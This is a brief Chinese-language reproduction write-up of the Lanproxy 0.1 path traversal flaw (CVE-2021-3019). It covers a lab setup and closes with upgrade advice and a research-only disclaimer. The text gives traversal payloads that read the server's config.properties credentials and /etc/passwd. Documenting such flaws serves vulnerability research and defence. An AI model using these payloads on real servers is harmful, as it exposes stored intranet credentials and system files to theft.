漏洞概述
Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
影响版本
lanproxy 0.1
环境搭建
下载proxy-server-0.1.zip
下载地址
https://file.nioee.com/d/2e81550ebdbd416c933f/
解压安装之后移动文件
mv proxy-server-0.1 /usr/local/
接着启动服务
cd /usr/local/proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh
访问 http://host_ip:8090 ,即可看到登录界面。
漏洞复现
Poc
/../conf/config.properties
接着我们在试试读取passwd
/../../../../../../../../../etc/passwd
成功读取
修复建议
升级到安全版本
本文始发于微信公众号(锋刃科技):Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论